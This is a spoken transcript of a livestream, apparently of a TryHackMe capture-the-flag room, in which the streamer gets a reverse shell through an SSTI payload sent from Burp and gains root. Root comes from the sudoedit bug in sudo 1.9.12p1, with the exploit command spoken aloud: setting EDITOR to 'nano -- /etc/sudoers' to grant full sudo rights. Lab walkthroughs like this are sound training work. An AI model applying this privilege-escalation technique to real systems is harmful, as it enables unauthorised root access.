nginx sites-available admin.cypressbank.thm as the root user. Okay. Wait, are we really going to be exploiting sudo? Checking the version of sudo, we see it as 1.9.12p1. That's so uncommon. Oh, man. Okay. That's why I'm not getting anywhere, because I hardly ever look for, vulnerabilities in sudo. Oh, so I just needed to look at, vulnerabilities in the sudo edit version, which is the command line tool that we're able to run against, this, against the site, using, sudo edit. Okay. So, if we run sudo edit -- version, you can see that the version is 1.9.12p1. So then if we just Googled that, we would have found out that it has a CVE. Phone. Probably find it with that. Here we go. Exploit DB. Interesting. I would have been stuck for years, though. Yeah, so would I. I'm really glad that there's a write-up out for this now. I'm so, out of the game of this, because, I don't know, I feel like that's not that much of a stretch. To look at the version of sudo edit and find out, and then Google it and find out that it has a privilege escalation vulnerability. But yeah, I need to start doing this a lot more so I can start getting back in the game of actually doing like pen testing, ethical hacking stuff. Alright, so what do we actually have to do? Is this just a, bash script, I think? Yeah, okay. So do we just have to run this? Let's see. Essentially, sudo edit allows users to choose their editor using environment variables such as sudo editor, visual, or editor, since the values of these variables can be not only the editor itself, but also the arguments to pass to the chosen editor. Sudo uses -- or -- while parsing them to separate the editor and its arguments from the files to open for editing. This means that by using the -- argument in the editor environment variables, we can force it to open files other than those allowed in the sudo edit command we can run. Consequently, since we can execute sudo edit as root with sudo, we can edit any file we want as root. Okay. To use this vulnerability for privesc, there are many files we could write to. In this case, we can simply choose to write to the etc sudoers file to grant ourselves full sudo privileges. Awesome! We can exploit the vulnerability as follows. Okay. So export editor, and then we set editor as nano space dash dash space slash etsy slash sudoers. And then we run sudo edit against the file. Okay. Very, very interesting. Okay, so I'll just copy this. Whoops, I think I missed the E on that. That's not a big deal. Okay, there we go. Crap. And of course, my terminal missed at the end. Alright, I guess I can't paste that. Why is this so screwed up? Jeez, I wonder if it's just because of the method that I got the shell with. Alright, I guess I'll type this out then. Export editor equals nano dash dash etsy sudoers. Oh my god, are you kidding me? It's just broken. What do I do? Always go full sudo. Haha, you never go full sudo. Oh, this is so annoying. My shell is just broken. And resetting it is not seeming to do anything. Maybe I could still run this though. Echo $ editor. Did that work? Yeah, okay, that seems to have worked. So maybe that's not as big of a deal. Maybe I can copy and paste this. Do I just go to the bottom of this and just add? Oh, okay, so I just need to go up here. I think I just take out, I think I just need to get rid of this. And the colon too, I think. Maybe it will let me save this. Okay. This is so freaking messed up. Okay, so now if I run sudo su dash. Oh crap. No, I can't do that. Let's see. Or add /bin bash after no password. Oh, okay. Oh, fuck. I just fucked myself, didn't I? is it asking me for a password? I really messed up this time, didn't I? I wasn't actually sure what the syntax for that was, and I did it anyway, and that was really stupid of me, I think. Or can I just do sudo nano etsy sudo There's no way. I've seen the syntax like this: hacker all equals all exclamation point root slash bin slash bash. Why is it asking me for my password if I said no pass WD? I literally just took out the colon and this part, I think. I think it's because we got rid of sudo edit. Fuck. Oh, what do I do now? I'm gonna have to terminate the machine again, aren't I? And do this all over again. Because I just killed the privesc vector. Crap. I don't know what to do. Oh. Would switching the editor to Vim matter? I mean, I could try. Just on Etsy sudoers? Or running this? It asks me for a password every time now. Terminating everything. I think I really screwed up. I should not have just willy-nilly put what I thought it should go in there in the sudoers file. Dang it, I really made this box so that one mistake means restart. Yeah, I know, I kinda hate this box, to be honest. It just has a lot of problems. Now what? This sucks. Oh, they did web all equals all, no pass WD all. Oh shit. Okay, so crap. Instead of taking out the colon and everything after it, I was just supposed to take out everything after the colon and replace it with all. Gosh dang it. Man. I really screwed myself again. Damn it. Oh, the machine is about to expire anyway. I mean, I know what to do now, so I don't think it should be too bad. And I saved this password. So... Alright. Terminate. Appreciate the confidence, Cyber Nerd.
Mm-hmm.
Okay, we have our IP address. We copy that. We go over here. This is completely fucked. um. Okay. Let me add this to my host file. So I'll replace this. Save this. The struggles of becoming a late hacker. Yet, mistakes are what help you learn. That's true. Clear. Sorry, my bad. You're good. Okay, so I did that. I go here. I hit X on this and I refresh. Seriously? What did I do wrong? 1010, 111, 87, 187. Let's see. Hosts. 1010, 111, 187. 1010, 111, 187. Why is this not working? Oh, is it because I need to take that off? No? What is going on? I'm getting a bad gateway. 1010, 111, 187. Is this service not up yet? No, it has to be up, yeah. There we go. Okay, maybe it just wasn't completely up yet. Okay. Gale... Aha! Sweet. So I just saved this in my browser. Log in. Go to settings. Then I turn on my proxy. Make sure this is ready to receive. I'm dropping this. Okay, test. Save. Don't need to worry about that. I'll send this to repeater. Go here. And then I have to go grab the payload again. Turn that off. Go back up here. Yes, I need this. I could just hit this copy button, and then I change the IP address. See, this is up, this is up. Nope, that's not up. I need to reset this. Seems to be 443. Wait, is it 443 or elite now? I can't remember. Can't index HTML. Oh, it is 443. That's what I thought. Okay, so turn that on. Whoops. Go here. Put that in there. And then I change this to 10.2.24.111. 10.2.24.111. Okay, send. Should get a shell. Now I need to do Python 3 tag C. Import pty pty semicolon pty dot spawn slash bin slash bash. Okay, control Z. stty export term equals x term. Control C. Awesome. Okay, so that's good to go. Sudo tac L. Export. Editor equals, okay. Editor equals nano dash dash slash etsy slash sudoers. I believe that's right. For editor equals nano dash dash etsy. Okay, yes. And then we run this. I go all the way down here. And I think all I need to do is change this. Whoops. To all colon all. And then change this to all. I'm not gonna save this yet though. I'm gonna make sure that's absolutely right. Okay. Then I change this to make this all. I think that's right. Yes, web all equals all. Oh, okay, yes, it doesn't need to be all colon all. No pass WD colon space all. Okay. This just needs to be all. Damn it. Okay. Alright. I believe this should work now, hopefully. So, I save this. I get out of that. I don't know why. Oh wait, is there something I have to change here too? I don't think so, is there? Let's see. After saving the file and closing both files, we can see the changes made to our sudo privileges. Oh, okay. Then I can run sudo su tac. Okay, so get me out of here. Okay, sudo tac L. Let me try that again. There we go. Okay, sudo su tac. Come on, come on, come on. Yes! I am root. Now I just cd into root. And I cat root.txt. Awesome. Okay. That was very, very interesting. That wasn't actually... I can see how that's an easy box. It has a few issues here and there, though. I don't know, I feel like maybe that could be a medium box. I am Groot! Jeez, why is this so slow? Oh, right. Because my CPU usage is really high right now for some reason. Probably because of burp and maybe because of my shell. But I don't have to worry about that anymore because I am done with this machine now. How long have I been streaming for?
Excellent.
Little over 2.5 hours. Yeah, I'm pretty tired. I think I'm about fit to be tied for the night. Why is this still hung? That's disabled. Oh well. I'm gonna go ahead and close that. Close this. And this is of course messed up. I tried to do as much of it as I could without the write-up, but it's a little bit more challenging than I thought it would be. I think that could probably be a medium room. I'm not sure that is... I don't think SSTI is really an easy vulnerability to exploit, so I'd say that's probably more of a medium room. Thank you very much, Anonymous Clover. Get some rest. Let me see if there's anyone to raid. I think Blaze is on right now. Oh yeah, he is. Yeah, we should raid Blaze. He's awesome. Wonder what he's doing. He's probably doing more like red teaming, mythic stuff and Active Directory stuff, I'm guessing. Great stream, man. I'll catch you next time. Thank you very much, Cybernerd. Yep, see you next time. I'm gonna go ahead and start the raid for Blaze. He's a really awesome cybersecurity streamer. And he was doing pen testing, and he did pen testing for a few years. And now he's actually a red teamer, which is really cool. So he has a pretty decent understanding of like real world threat actor activity and all that. But let's go ahead and raid him. Cause he's a really cool guy. Alright, so I'll start the raid. Alright, well I hope you had fun tonight, guys. I did. I learned a lot. I'm probably gonna go over this room to take a closer look and kind of get more familiarized with the vulnerabilities. But I think it's a pretty good room. I think maybe it could be a medium room for Try Hack Me. But I think it was a lot of fun in general. But yeah, hopefully you guys enjoyed it. I'll see you next time. I'm not really sure. Maybe I'll stream again on Tuesday. But anyway, hope you have a good rest of your night, day, afternoon, whatever it is for you. And I'll see you again next time.